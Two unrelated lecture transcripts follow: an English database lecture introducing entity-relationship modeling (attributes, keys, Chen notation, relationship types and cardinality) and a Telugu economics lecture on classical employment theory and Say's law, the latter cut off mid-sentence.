changing, but actual entity type does not frequently change unless there is an inevitable requirement to add new attributes to it or modify the existing attributes. So the actual data, the actual entities stored in your entity type is called entity set. So that we will discuss in the subsequent slides. The next one is attribute types and attribute. So each entity has several attributes as we discussed. So in this case you have several attributes. For example, employee entity has SSN, name, address, etc. So these attributes
So each attribute has a single atomic value. So these are called attributes. The properties of your entity are called attributes. They can be categorized into different types. One is simple data type, simple attribute type, which means it consists of only atomic value and non-composite value. You cannot further divide it. For example, SSN cannot be divided. Your Aadhaar number cannot be divided into different parts. Your gender cannot be divided into different parts. It's an atomic value. You have only a simple value. There may be certain composite attributes, like you can further divide them. Your name may have your first name, last name, middle initial, etc. Or address. Your address has first line, second line, address line 1, address line 2, city, state, postal code, pin code. So all those things, country name, etc. So it is a decomposable attribute. So such attributes are called composite attributes. And there are multi-valued attributes. So an attribute may have multiple values. For example, you have an entity called car. So car is available in different colors. So color is a multi-valued attribute. So degrees of a student can possess multiple degrees. So that's a multi-valued attribute. Likewise, customer account numbers. A customer can have multiple bank account numbers because he may have different bank accounts, accounts with different banks. So obviously, customer account numbers is a multi-valued attribute. So an attribute of an entity type. And the next thing is the key attribute. So what do you mean by key attributes? So you have entity type. Entity type consists of several entities. So how do you identify each entity uniquely? For example, I want to find out the details of a particular employee in employee entity type. How can I identify that? So to identify a particular entity, you may define an attribute with certain unique value. So that attribute is called key attribute. For example, your Aadhaar number or employee ID can be used to uniquely identify a particular employee, or student roll number. Roll number itself can be used to uniquely identify a student. So the attribute which can be used to uniquely identify an entity is called the key attributes. The reason why we are discussing these dimensions, these definitions, is to understand the ER modeling. So now that we have understood the entities, the attributes of entities, what are different kinds of attribute types, what is an entity type, and what is a key attribute. So how do we diagrammatically represent these entities? So this is another thing, because as discussed earlier, ER modeling is not a descriptive one, it's a diagrammatic representation. So how do you describe your entities and attributes diagrammatically? So an entity type is generally displayed in a rectangular box. So there are different notations, but the notation that we are following is the one which is proposed by Peter Chen in 1976. So we are following the same thing here. So rectangular box, your entity type is represented in a rectangular box, and attributes are displayed in ovals. So each attribute is connected via a line. So components of composite attribute are connected to multiple ovals. For example, your address has address line 1, 2, zip code, etc. So again, multiple ovals are created and they are connected to the address attributes. So multi-valued attributes are displayed in double ovals, so 2 overlapping ovals, and each k attribute is underlined just to indicate that this particular attribute can be used to uniquely identify an entity. So let's look at the company database entity diagram. So we have identified, the very first step is to identify entities. In any database design, the very first step is to identify the entities. In your company data domain, you have an employee, you have a project, you have department, you have a dependent, because these are the noun forms that we have looked at. Maybe you can further refine it, but at this moment, at a high level, this is what we can understand. So department has a name, so that is represented in oval, and department has a number, department has a manager, department has a manager start date, because manager keeps changing. So obviously, when is the new manager appointed? So his joining date or starting date is also important for us. It's an important data requirement. Assuming it's an important data requirement, we have put it as an attribute. And locations, we know that department can exist in multiple locations. So obviously, it is represented using 2 ovals or double line oval.
Likewise, you have project. Project has a name, number, controlling department. You have a location. Project exists in only one location. It is not executed in multiple locations. That's why it's a single valued attribute here. And you have employee. As you can see, employee has several attributes. Employee name is a composite attribute. That's why it is further refined. It's further divided into F name, nothing but first name, middle initial, and last name. So it says that name is not a simple attribute, but it's a composite attribute. Employee is always associated with a single department because that's what we have specified in our requirement specification, and he has birth date, salary, and etc. and works on. Employee can work on multiple projects. That's why it's a multi-valued attribute, and this is a composite attribute as well. So works on project, and he works on, because assuming he works 9 hours a day, so 6 hours for one project, 3 hours for another project. So that's why it's a composite attribute. Likewise, dependent is also another entity. So does it suffice to actually represent the entire domain? So entities alone do not represent the complete database conceptually. So because you haven't specified the relationships, because specifying entities will not give you the complete picture. So how are they related? Because we know that employee is working in a department, employee works on a project, employee has dependents. So where are those relationships specified? Without specifying those relationships, there is no meaning for your data requirements, because if you look at your actual requirement description, so it is specifically specified that essentially each employee works for only one department. That's the key thing here. So where is that relationship specified? But he may work on multiple projects. So where is that relationship? So that is also an important part to be specified in your conceptual design. So entities, they represent only some part of your database, but they do not represent the complete details of your database. So we need to specify how those entities are related. So entity relationships are specified using relationships. So that's why it is called an entity relationship model. It's not just an entity model, but entity relationship model. So what do you mean by a relationship? A relationship relates two or more distinct entities. It does not talk about the entity types, it talks about the entities. So two or more distinct entities with specific meaning. So because that relationship has some kind of a meaning, it has to be meaningful. So for instance, employee John Smith works on product X project. Employee John Smith works in research department. So these are important relationships. So there is a relationship between employee John Smith and department research. There is a relationship between employee John Smith and project product X. So how do you specify those relationships? Relationships of the same type are grouped into a relationship type. So now that we have understood the relationship exists between two entities. It does not exist on entity types. It does not exist between entity types. It exists only between two entities. As I said, John Smith works on product X. So obviously John Smith is related to product X project. He is not related to any other project. He is related to research department. So there is a relationship between John Smith and research department. There is no other relationship between other departments and John Smith. So relationships of the same type, like there may be multiple employees working on multiple projects. There may be multiple employees working for multiple departments. So all such relationships of the same type are grouped into or specified into a relationship type. Just like multiple entities are grouped into an entity type, multiple relationships of the same type are grouped into a relationship type. For example, works on relationship. So employee John Smith works on product X. Likewise, employee Stephen Smith works on product Y. Likewise, employee Joe Burns works on product Z. So these are all related. These are all of the same type because employee working on a project. So obviously you can group all such relationships into a relationship type. In this case, you can define a new relationship type called works on, which exists between employee entity type and project entity type. So you need to distinguish between entity type and entity. That is essential part in your entity relationship diagram. So the next thing is, how do we specify the
degree of a relationship. What do you mean by a degree of relationship? As if you look at the definition of a relationship can exist between two or more entities. So how many entities are participating? So if you talk about the relationship type, how many entity types are participating? If it is two, for instance, employee entity type is related to project entity type via works on. So there are only two entity types, employee and project. So that's why it's a binary relationship. But there may be cases where multiple entity types participating into one relationship. So in that case, the degree of the relationship changes. For example, if you have three different entity types participating in a relationship type, then or connected through a relationship type, the degree of that relationship type is 3. So you can extend it, but generally we deal with binary relationship. Even though we have relationship types of higher degree, we will try to decompose them into binary relationship, because expressing relationship types is easier with binary relationships. So relationship types and relationship sets. So relationships of the same type are grouped into a relationship type, as we've already seen the previous slide. In this case, works on relationship type is a connection or the relation between your employee entity type and project entity type. So it is the schema description. Basically, entity is the schema description of the real world thing, and relationship type is the schema description of your relationship. It has a relationship name and participating entity types. At the same time, relationship type may also have certain attributes. Relationship type also may have certain attributes. So we must consider those things also into account and specify. So relationships maintained in a relationship type, as I said, entity is the physical thing, entity type is the conceptual thing, and the list of entities stored in a relationship type is called an entity set. Similarly, relationship is the physical thing, it exists between two entities. Relationship type is the conceptual thing which exists between two or more different entity types, and relationship set is the actual list of relationships stored in the relationship type. It represents the current state of your relationship type. So how do we specify the diagrammatic notation of relationship type? Relationship types are specified using a diamond shaped box, and the entity types participating in that relationship type are connected through single lines via straight lines. So this is your ER diagram. As you can see, employee works for department, and employee manages a department, employee works on projects. So employee has a lot of dependents. An employee can have a supervisor. Supervisor is also another employee. So this is the entity relationship diagram. At the same time, we also specify the cardinality. Cardinality is nothing but how many entities can participate in relationship type. For example, n employees can work for one department. So any number of research department, it does not consist of only one employee. It may have several employees. That's why n employees can work for one particular department, and each employee can participate on multiple projects. So, and a project can have multiple employees. So obviously this is m is to n. So this is similar to your functions. So m is to the functional relationships in functions. So that is a brief description of your company database. It's a conceptual diagrammatic notation of your company database. So from here on, we need to still extend. So what are different types of relationships, and how do we specify the cardinality, the relationships of higher degree, how do we specify? So what are different types of entities, weak entities? So all those things we will discuss in the subsequent session. So this gives you a brief introduction to ER modeling, and then we will further extend it to other types of ER models like extended ER model and alternate notations for ER model. So again, you can go through the chapter 7 in the fundamentals of database by Elmastri and Navate for more details on this session. Thank you.
నమస్తే విద్యార్థులకు ఉపాధ్యాయులకు అందరికీ నా నమస్కారం. నేను డాక్టర్ సిహెచ్ శంకర్రావు, లెక్చరర్ ఇన్ ఎకనామిక్స్, టిఆర్ఆర్ గవర్నమెంట్ డిగ్రీ కాలేజ్, కందుకూరు, ప్రకాశం డిస్టిక్, ఆంధ్రప్రదేశ్. ముందుగా నాకు ఈ అవకాశం ఇచ్చిన కమిషనర్ ఆఫ్ కాలేజ్ ఎడ్యుకేషన్ ఏపీకి, దాని కోఆర్డినేటర్కి, మన టీవీ ప్రోగ్రామ్ కోఆర్డినేటర్కి అందరికీ నమస్కారం. ఈరోజు మనం చర్చించుకోబోయే అంశం బిఏ ఎకనామిక్స్లో క్లాసికల్ థియరీ ఆఫ్ ఎంప్లాయ్మెంట్, సాంప్రదాయ ఉద్యోగ సిద్ధాంతం. ఈ పాఠంలో మనం ముందుగా ఏం తెలుసుకోబోతున్నాం అంటే, ఈ సాంప్రదాయ ఆర్థికవేత్తలు ఎవరు, వాళ్ళు చెప్పిన సిద్ధాంతం ఏంటి, వాళ్ళు చెప్పిన మెయిన్ ప్రమేయాలు ఏంటి, వాటిల్లో ముఖ్యంగా సే సూత్రం, ధరలు, వేతనాల సరళత్వం, తర్వాత యొక్క పొదుపు పెట్టుబడుల యొక్క ఈక్వాలిటీ, తర్వాత దీని మీద విమర్శలు, అది ఇప్పుడు ఈ సాంప్రదాయ ఉద్యోగ సిద్ధాంతం ఇప్పుడున్న ప్రజెంట్ ఆర్థిక వ్యవస్థలో ఎంతవరకు ఇప్పుడు రిలవెంట్, దీని నుంచి నేర్చుకోవాల్సిన పాఠాలేంది అనేది ఇక్కడ మనం మొట్టమొదటిగా నేర్చుకోవడం అనేది జరుగుతుంది. తర్వాత ఈ లెక్చర్ ఏ విధంగా ప్రణాళిక వేయబడిందంటే, మొట్టమొదటిసారిగా మనం ఈ సాంప్రదాయ సిద్ధాంతం అంటే ఏదో తెలుసుకోవడం జరుగుతుంది. దాని తర్వాత సెకండ్ పార్ట్లో అది ఏ విధంగా పనిచేస్తుందని తెలుసుకోవడం జరుగుతుంది. దాని తర్వాత కీన్స్ ఏ విధంగా దీన్ని విమర్శించాడు, దాని తర్వాత ఈ ప్రస్తుత ఆర్థిక వ్యవస్థలో దీని యొక్క ప్రాధాన్యత ఏంటి అనేది తెలుసుకోవడం అనేది జరుగుతుంది. మొట్టమొదటి అంశం, ఎవరు ఈ సాంప్రదాయ ఆర్థికవేత్తలు? సాంప్రదాయ ఆర్థికవేత్తలు అంటే ఎవరో కాదు, మొట్టమొదటిసారిగా ఆర్థిక శాస్త్రాన్ని ఒక సూత్రాల రూపంలో చెప్పిన వాళ్ళందరూ కూడా సాంప్రదాయ ఆర్థికవేత్తలు. వీళ్ళలో మొట్టమొదటిగా అర్థశాస్త్ర పితామహుడైన ఆడమ్ స్మిత్, డేవిడ్ రికార్డో, జేఎస్ మిల్, మాల్థూస్, జేబీసే, పీగో, మార్షల్, వీళ్ళందరూ రావటం జరిగింది. ఈ సాంప్రదాయ ఆర్థికవేత్తలు అనేది మొట్టమొదటిగా పేర్కొన్నది కార్ల్ మార్క్స్. అతని ప్రకారం సాంప్రదాయ సిద్ధాంతవేత్తలు ఎవరు అంటే ఆడమ్ స్మిత్, డేవిడ్ రికార్డో. దాని తర్వాత జేఎం కీన్స్ కూడా ఈ సాంప్రదాయ ఆర్థికవేత్తల గురించి ప్రస్తావించడం జరిగింది. అతని ప్రకారం అతని ముందున్న ఆర్థికవేత్తలు ఎవరైతే ఉన్నారో వాళ్ళు మొత్తం కూడా సాంప్రదాయ ఆర్థికవేత్తలన్నీ పేర్కొన్నారు. వాళ్ళు జేబీసే, జేఎస్ మిల్, మార్షల్, ఏసీ పిగో, వీరు. తర్వాత ముందుగా థియరీలో ఎంటర్ అవబోయే ముందు మనం అసలు ఆర్థిక వ్యవస్థ యొక్క ముఖ్య ఉద్దేశం ఏంటి, ఆర్థిక సిద్ధాంతం యొక్క ముఖ్య ఉద్దేశం ఏంటంటే, కొరతగా ఉన్న వనరుల్ని అపరిమితమైన కోరికల కోసం ఒక సమర్థవంతంగా ఉపయోగించుకుంటూ మానవుల శ్రేయస్సు కోసం మానవ యొక్క జీవన ప్రమాణాలను పెంచటమే ఆర్థిక శాస్త్రం యొక్క ముఖ్య ఉద్దేశం. దాంట్లో భాగంగానే ఈ సాంప్రదాయ ఉద్యోగ సిద్ధాంతం అనేది మొట్టమొదటిగా ప్రవేశపెట్టబడింది. దాంట్లో కొన్ని ప్రమేయాలు ఉన్నాయి. అవి తెలుసుకునే ముందు ఈ ప్రమేయాలు అర్థమైతేనే మనకి సిద్ధాంతం కూడా పూర్తిగా అర్థమవుతూనే జరుగుతుంది. ఆ సిద్ధాంతం మొత్తం ఈ ప్రమేయాల రూపంలోనే, ఈ ప్రమేయాల లిమిట్లోనే పనిచేయటం అనేది జరిగింది. వీటినే ఇంగ్లీష్లో వి కాల్ ఇట్ as అజంప్షన్స్. మొట్టమొదటి అజంప్షన్, మొట్టమొదటి ప్రమేయం ఏంటంటే, మానవుడు అనేవాడు హేతుబద్ధుడు. ఆ హేతుబద్ధత ఎట్లా ఉంటుందంటే, ఒక స్వీయ ప్రయోజనం, ఎన్లైటెడ్ సెల్ఫ్ ఇంట్రెస్ట్ అంటే అనటం జరుగుతుంది. అంటే మానవుడు తన స్వంత ప్రయోజనం కోసం పనిచేస్తూ ఉంటాడు. దాని తర్వాత గవర్నమెంట్ ఎట్లా ఉంటుందంటే, గవర్నమెంట్ ఇంటర్ఫీరెన్స్ అనేది పాత్ర అనేది చాలా తక్కువగా ఉంటుంది. దీన్నే సాంప్రదాయ ఆర్థికవేత్తలు ఏమని పిలవటం జరిగిందంటే లీజా ఫెయిర్ పాలసీ అని పిలవడం జరిగింది. దాని తర్వాత ఆర్థిక వ్యవస్థ అనేది చాలా స్వేచ్ఛాపూరితంగా
ఒక ఇన్విజిబుల్ హ్యాండ్ అంటే ఒక అగోచర హస్తం అనేది నడిపిస్తూ ఉంటుందన్నమాట. ఇక్కడ ఏదైనా ఎకనామిక్ ఫోర్సెస్ సెల్ఫ్ అడ్జస్టింగ్గా అంటే వాటంతట అవే డిమాండ్ కానీ సప్లై కానీ పెరగటం తగ్గటం ఏంటంటే ఒక ఇన్విజిబుల్ హ్యాండ్గా రూపంలో పెరగటం తగ్గటం అనేది జరుగుతూ ఉంటుంది. దీన్నే మనం ఫ్రీ మార్కెట్ అంటాం. ఈ మార్కెట్లో ఇది పర్ఫెక్ట్ కాంపిటీషన్ మార్కెట్ అని చెప్పడం జరుగుతుంది. తర్వాతది ఎజంప్షన్ సేస్ లా, దీన్నే సేస్ సూత్రం అంటారు. ఇది జేబీసే ప్రవేశపెడతాం జరిగింది. దీని గురించి ముందుగా తెలుసుకుంటాం తర్వాత. ఇది క్లుప్తంగా చెప్పాలంటే ఇక్కడ సప్లై అనేది తాను డిమాండ్ని అదే సృష్టించుకుంటుంది అని చెప్పడం జరుగుతుంది. దీని గురించి వివరంగా ముందు తెలుసుకుంటాం ఖచ్చితంగా. దాని తర్వాత ధరలు వేతనాల యొక్క సరళత్వం. ధరలు వేతనాల యొక్క సరళత్వం ఎప్పుడైతే అన్ఎంప్లాయ్మెంట్ నిరుద్యోగిత ఎక్కువగా ఉత్పత్తి ఉంటుందో ఈ ధరలు సరళత్వం పనిచేయటం ద్వారా వాటిని తొలగించబడటం అనేది జరుగుతుందన్నమాట. సో తర్వాత ప్రిన్సిపల్ అజంప్షన్ ఏంటంటే సేవింగ్ ఇన్వెస్ట్మెంట్ ఈక్వాలిటీ. ఇదే పెట్టుబడి ఈ పొదుపుల మధ్య ఉన్న సమానత్వం అన్నమాట. ఇది ఏ విధంగా వస్తుందంటే ఈ పొదుపు పెట్టుబడుల మధ్య సమానత్వం అనేది ఇంట్రెస్ట్ రేట్ ఆపరేట్ అవ్వటం ద్వారా రావటం జరుగుతుంటుందన్నమాట. ఇంట్రెస్ట్ రేట్ సేవింగ్ని ఇన్వెస్ట్మెంట్ని పెంచడం తగ్గించటం అనేది జరుగుతుంది. ఎప్పుడైతే ఇన్వెస్ట్మెంట్ తక్కువగా ఉందో అప్పుడు ఇంట్రెస్ట్ రేట్ని తగ్గించి ఇన్వెస్ట్మెంట్ని పెంచడం అనేది జరుగుద్ది. ఎప్పుడైతే సేవింగ్ తక్కువగా ఉంటుందో అప్పుడు ఇంట్రెస్ట్ రేట్ని పెంచి సేవింగ్ అంటే పొదుపుని పెంచటం అనేది జరుగుతుంది. సో ఈ విధంగా మనుషులు సంపాదించిన ఆదాయంలో ఎప్పుడైనా కొంత వినియోగం చేయడం జరుగుతుంది, కొంత పొదుపు చేయడం జరుగుతుంది. ఆ చేసిన పొదుపు తప్పకుండా పెట్టుబడికి వెళ్ళిద్ది అనేది ఈ యొక్క ప్రమేయం యొక్క ముఖ్య ఉద్దేశం. పొదుపు మొత్తం కూడా పెట్టుబడిగా మారిద్ది. ఎప్పుడైతే దాంట్లో కొంచెం అవకతవకలు ఇంబ్యాలెన్స్ ఉంటుందో అది ఇంట్రెస్ట్ రేట్ వడ్డీ రేటు ద్వారా అడ్జస్ట్ అవ్వటం అనేది జరుగుతుంటుంది. దాని తర్వాత ప్రమేయం, ఇది చాలా అతి ముఖ్యమైన ప్రమేయం. ఇది న్యూట్రాలిటీ ఆఫ్ మనీ అంటారు. అంటే ఇక్కడ ద్రవ్యం యొక్క పాత్ర అనేది కేవలం మీడియం ఆఫ్ ఎక్స్చేంజ్గా అంటే జస్ట్ వినిమయంగా ఉంటుంది. ద్రవ్యం తన కీలకమైన పాత్ర కేవలం వినిమయంగా ఉంటుందే తప్పితే ద్రవ్యం డైరెక్ట్ ఉత్పత్తికి తోడ్పడదు. కేవలం వినిమయ మాధ్యమంగా ఉంటుంది, అంతకన్నా ఏమీ ఉండదు దీని పాత్ర. దాన్నే న్యూట్రాలిటీ ఆఫ్ మనీ అని అంటం జరుగుతుందన్నమాట. దాని తర్వాత ఇక్కడ ఉత్పత్తి అనేది కేవలం నిజమైన అంశాల మీద, వాస్తవ అంశాల మీద ఆధారపడి ఉంటుంది. అవి వాస్తవ అంశాలంటే మన కంటికి కనపడే శ్రమ, మూలధనం, సాంకేతికత, వీటి మీదే ఉత్పత్తి అనేది ఆధారపడి ఉంటుంది. ద్రవ్యపరమైన అంశాల మీద ఆధారపడి ఉండదు అనేది చెప్పటం జరుగుతుందన్నమాట. ఈ యొక్క మొత్తం ప్రమేయాల్ని దృష్టిలో పెట్టుకొని ఈ మొత్తం ప్రమేయాల బేస్ మీదుగా ఇప్పుడు సాంప్రదాయవాదులు చెప్పిన, సాంప్రదాయ ఆర్థికవేత్తలు చెప్పిన సిద్ధాంతం అనేది, ఈ ఎంప్లాయ్మెంట్ థియరీ అనేది, ఉపాధి సిద్ధాంతం అనేది ఏ విధంగా పనిచేస్తుంది అనేది ఇప్పుడు మనం తెలుసుకోబోతున్నాం.
ఇప్పుడు సాంప్రదాయ ఉద్యోగ సిద్ధాంతం అనేది ఏ విధంగా పనిచేయబోతుంది అనేది మనం తెలుసుకుంటూ ఉంటాం. ఇప్పుడు సాంప్రదాయ ఉద్యోగ సిద్ధాంతం దీన్నే క్లాసికల్ ఇన్కమ్ ఎంప్లాయ్మెంట్ థియరీ అని అంటం జరుగుతుంది. ఎందుకంటే ఈ ఉద్యోగంలోనే ఆదాయం కూడా ఇమిడి ఉంటుంది కాబట్టి దీన్ని ఆదాయ ఉద్యోగ సిద్ధాంతం అంటారు. అంటే ఉద్యోగం వచ్చిందంటే ఖచ్చితంగా ఆదాయం కూడా వస్తుందనేది ప్రమేయం అన్నమాట. ఇది ఏ విధంగా పనిచేస్తుంది, హౌ ఇట్ విల్ ఆపరేట్, ఏ విధంగా పనిచేస్తుంది అంటే ముఖ్యంగా ఇది ఇందాకనే చెప్పుకున్నాం ప్రమేయాల్లో నిజమైన అంశాల మీద ఆధారపడి ఉంటుంది. ఈ నిజమైన అంశాలు ఏంటి అంటే సాంప్రదాయ ఉద్యోగ సిద్ధాంతం ప్రకారం ఉత్పత్తి ప్రొడక్షన్ అనేది శ్రామికుల మీద, పెట్టుబడి మీద, అదేవిధంగా సాంకేతికత మీద ఆధారపడి ఉంటుంది. స్వల్పకాలంలో ఈ పెట్టుబడి సాంకేతికత అనేది తక్కువగా స్థిరంగా ఉంటుంది కాబట్టి ఇది స్వల్పకాలంలో ఉత్పత్తి అనేది శ్రామికుల మీద ఆధారపడి ఉంటుంది. శ్రామికులను పెంచుకుంటా పోతే ఉత్పత్తి కూడా పెరుగుతుంది. అంటే ఇక్కడ ఉత్పత్తి పెంచుతూ ఉంటే శ్రామికులకి ఉద్యోగం దొరుకుతుంది, ఉద్యోగం దొరికి ఆదాయం కూడా వస్తుంది కాబట్టి నిరుద్యోగత అనేది అసలు ఉండదు అనేది వీళ్ళ మెయిన్ సిద్ధాంతం. అంటే ఉత్పత్తి జరుగుతూ పోతూ ఉంటే శ్రామికులు ఒకళ్ళకొకళ్ళు ఉద్యోగం కల్పించబడి ఎవరైతే ఉద్యోగం కావాలనుకుంటున్నారో, పనిచేయడానికి సిద్ధంగా ఉన్నారో వాళ్ళందరికీ ఉద్యోగిత ఖచ్చితంగా కల్పించబడుతుంది అనేదాన్ని సాంప్రదాయవాదులు గట్టిగా విశ్వసిస్తారన్నమాట. ఎప్పుడైనా సరే స్వల్పకాలంలో నిరుద్యోగత అనేది ఏ విధంగా వచ్చినా కానీ అది అతి తక్కువ కాలంకి మాత్రమే నిరుద్యోగత అనేది ఉంటుంది. దీన్నే ఇంగ్లీష్లో వి కాల్ ఇట్ యాజ్ ఫ్రిక్షనల్ అన్ఎంప్లాయ్మెంట్. అంటే ఒక సైడు ఉద్యోగుల కోసం డిమాండ్ ఉంటుంది, ఇంకొక సైడు కావాల్సిన పనిచేయడానికి సిద్ధంగా ఉంటారు. కేవలం ఈ రెండిటి మధ్య మిస్ మ్యాచ్, కమ్యూనికేషన్ గ్యాప్ ఉంటుమే తప్పితే కావాల్సి పనిచేయడానికి ఉన్నారు, అటువైపు ఉద్యోగాలే ఉన్నాయి. కావాల్సిందంటే వాటిని కలిపే ఛానల్ ఒకటే. అది అప్పుడు దాన్ని ఏమంటారంటే ఫ్రిక్షనల్ అన్ఎంప్లాయ్మెంట్ అండ్ ఘర్షణ నిరుద్యోగిత అని చెప్పేసి అంటం జరుగుతుంది. సాంప్రదాయ ఉద్యోగ సిద్ధాంతవాదులు చెప్పింది ఏంటంటే ఎప్పుడైనా స్వల్పకాలంలో ఉంటే ఫ్రిక్షనల్ అన్ఎంప్లాయ్మెంట్ అనేది ఘర్షణ నిరుద్యోగిత అనేది మాత్రమే కొంచెం ఉండటం జరుగుతుంది తప్పితే వాలంటరీ అన్ఎంప్లాయ్మెంట్ అనేది ఉండదు. అంటే స్వచ్ఛందంగా నిరుద్యోగులు అనేది ఎవరు ఉండరు అనేది బాగా విశ్వసిస్తారు ఈ సాంప్రదాయవాదులు. తర్వాత ఈ మోడల్ ఏ విధంగా పనిచేస్తుందంటే ఎప్పుడు ఉద్యోగం అనేది ఎక్కువ స్థాయిలో ఉండటం జరుగుతుంది, నిరుద్యోగిత అనేది కేవలం తాత్కాలికమే, ఎప్పుడు ఉద్యోగ స్థాయి ఎక్కువగా సంపూర్ణ ఉద్యోగిత ఉంటుంది అని చెప్పేసి సాంప్రదాయవాదులు విశ్వసించారు. కాబట్టి అది ఏ విధంగా ఎప్పుడు సాంప్రదాయపరమైన ఉద్యోగిత అనేది సంపూర్ణంగా ఎట్లా ఉంటుంది అనేది వాళ్ళు కొన్ని ప్రమేయాల ద్వారా, కొన్ని సూత్రాల ద్వారా చెప్పటం అనేది జరిగింది. ఆ సంపూర్ణ ఉద్యోగిత అనేది కొన్ని సూత్రాల ఆధారంగా ఎప్పుడు ఉంటుంది అనేది సాంప్రదాయవాదులు చెప్పటం జరుగుతుంది. వాటిల్లో మొట్టమొదటిది సే సూత్రం. ఇంగ్లీష్లో వి కాల్ ఇట్ యాజ్ సేస్ లా. యాజ్ పర్ సేస్ లా సప్లై క్రియేట్స్ ఇట్స్ ఓన్ డిమాండ్. అంటే ఉత్పత్తి జరిగింది అంటే ఆ ఉత్పత్తిలో చాలామంది ఉత్పత్తి కారకాలకి వాళ్ళకి ఆ పేమెంట్స్ పొందుతారు కాబట్టి, ఉత్పత్తి కారకాల ప్రతిఫలాలు పొందుతారు కాబట్టి ఆ ప్రతిఫలాలు వాళ్ళకి ఆదాయంగా వస్తుంది. ఆ ఆదాయాన్ని ఉపయోగించే అదే ఉత్పత్తిని కొనటం అనేది జరిగిద్ది. ఆ కొనటం అంటే ఏంటంటే డిమాండ్. అంటే సప్లై
క్రియేట్స్ ఇట్స్ ఓన్ డిమాండ్ అంటే ఉత్పత్తి జరిగినప్పుడు ఉత్పత్తి కారకాలకు ఆ ప్రతిఫలాలు వచ్చినప్పుడు ఆ ప్రతిఫలాలు ఆదాయంగా మారి ఆ ఆదాయాన్ని ఉపయోగించి అదే ఉత్పత్తిని కొనటం అనేది జరుగుతుంది. కాబట్టి సప్లై జరిగిందంటే ఉత్పత్తి జరిగిందంటే డిమాండ్ అనేది కంపల్సరీ జరుగుద్ది అనేది జేబీ సే అనే ఆర్థికవేత్త చెప్పటం అనేది జరిగింది. సో ఇది ఇక్కడ సేవింగ్ అనేది ఎప్పుడైనా ఆదాయం వచ్చినప్పుడు కొంత భాగం సేవింగ్ ఏమైనా చేస్తే పొదుపు చేస్తే ఆ పొదుపు కూడా పెట్టుబడి రూపంలో తప్పకుండా వస్తుంది అనేది చెప్పటం మూలాన ఇక్కడ ఎట్లాంటి లీకేజెస్ అనేది ఉండదు. సేవింగ్ రూపంలో కొంత ఆదాయం వినియోగం కాకుండా పక్కకి వెళ్ళినా కానీ ఆ వినియోగం తప్పకుండా ఆ పొదుపు అనేది తప్పకుండా పెట్టుబడి రూపంలో సర్టెన్ ఇంట్రెస్ట్ రేట్ దగ్గర ఖచ్చితంగా ఖర్చు చేయబడుతుంది. అది డిమాండ్ రూపంలో వస్తుంది. కాబట్టి ఇక్కడ ఎట్లాంటి లీకేజెస్ కూడా ఉండటం అనేది జరగదు. కాబట్టి సేల్స్ లా చెప్పేది ఏంటంటే సప్లై క్రియేట్స్ ఇట్స్ ఓన్ డిమాండ్. సప్లై చేస్తే చాలు డిమాండ్ అదంతట అదే అమ్మబడుతుంది కూడా అనేది. సో దీన్ని ఒక ఎగ్జాంపుల్ తీసుకొని కూడా మనం చెప్పవచ్చు. సపోజ్ ఒక రైతే కొంత ధాన్యాన్ని బియ్యాన్ని రైస్ ఉత్పత్తి చేశాడు అని అనుకుందాం. ఆ ఉత్పత్తి యొక్క విలువ మొత్తం 10,000 రూపాయలు అనుకుంటే ఆ 10,000 రూపాయలు ఉత్పత్తి చేయడానికి అంటే సప్లై చేయడానికి అతను కొన్ని ఉత్పత్తి కారకాలను ఉపయోగించడం అనేది జరుగుతుంది. ఆ ఉత్పత్తి కారకాలు ఏవేంటి అంటే మనకందరికీ తెలుసు, అది భూమి, శ్రమ, కొంత మూలధనం, తర్వాత వ్యవస్థాపనకి అతనికి వచ్చే లాభం మార్జిన్. సో ఇక్కడ భూమి వాడుకున్నందుకు గాను భూమికి భూ యజమానికి 2,000 రూపాయలు ఇవ్వడం జరుగుతుంది. శ్రామికులను వాడుకున్నందుకు గాను శ్రమకు 3,500 రూపాయలు ఇవ్వడం జరిగింది అనుకోండి. తర్వాత మూలధనం కింద విత్తనాలు, కొన్ని యంత్రాలు, ట్రాక్టర్లు అట్లాంటివి, తర్వాత ఎరువులు, పురుగు మందులు, ఫెర్టిలైజర్స్ అండ్ పెస్టిసైడ్స్ వాటన్నిటికి గాను ఒక 2,500 అయింది అనుకున్నాం. అతనికి లాభం 2,000 రూపాయలు. అది మొత్తం ఆర్గనైజ్ చేసినందుకు ఒక 2,000 రూపాయలు అతనికి అనుకుంటే ఈ 4 రకాల్లో ఉత్పత్తి కారకాలకు పంపకాలు అనేది జరుగుతూ ఉంటాయి. ప్రతిఫలాలు అనేది రావటం చెల్లించబడటం జరిగింది. ఈ ప్రతిఫలాలు మొత్తం మనం లెక్కేస్తే 10,000 రూపాయలు ప్రతిఫలాలు చెల్లించబడ్డాయి. ఆ ఉత్పత్తి యొక్క మొత్తం విలువ 10,000 రూపాయలు. ఉత్పత్తి కారకాలకు చెల్లింపబడ్డ చెల్లింపులు 10,000 రూపాయలు. ఈ ఉత్పత్తి కారకాలకు చెల్లింపబడ్డ చెల్లింపులు వాళ్ళు అవే ఉపయోగించి అదే ధాన్యం కొనటం అనేది జరిగింది అని అనుకుంటే ఆ ధాన్యం మొత్తం కూడా మళ్ళీ 10,000 రూపాయలకి కొనబడటం జరుగుతుంది. ఇక్కడ ద్రవ్యం అనేది కేవలం వినిమయంగానే ఉపయోగిస్తారు. ఒకవేళ ఆ రైతు కానీ మిగతా శ్రామికులు కానీ పెట్టుబడిదారులు కానీ ఎవరైనా అక్కడ కొంత వినియోగం చేయకుండా, డిమాండ్ చేయకుండా కొంత పెట్టుబడి కోసం కొంత పొదుపు చేశారని అనుకున్నా కానీ ఆ పొదుపు ఆ సేవింగ్ ఇన్వెస్ట్మెంట్ ఈక్వాలిటీ అనే అజంప్షన్లో దాని కింద పొదుపు పెట్టుబడుల సమానత్వం కింద ఖచ్చితంగా పొదుపు మొత్తం కూడా పెట్టుబడి రూపంలో రావటం అనేది జరుగుద్ది. జరిగి ఎట్లాంటి లీకేజెస్ లేకుండా 10,000 రూపాయలు ఉత్పత్తి జరిగితే 10,000 రూపాయలకి ఈ ఉత్పత్తి కారకాలకు ప్రతిఫలాలకు చెల్లింపులు చెల్లించబడి ఆ 10,000 రూపాయలు ఉపయోగించి మళ్ళీ ఆ 10,000 రూపాయలతోటి ధాన్యాన్ని కొనటం అనేది జరగచ్చు. సో ఈ విధంగా ధాన్యం ఉత్పత్తి అయితే ధాన్యం కొనగలిగే కొనుగోలు శక్తి కూడా దాని నుంచే రావటం జరుగుద్ది. ఎందుకంటే ఆ ఉత్పత్తి కారకాలని ఉపయోగించటం వల్ల. సో ఈ విధంగా ఉత్పత్తి జరిగినప్పుడు ఉత్పత్తి కారకాలకు 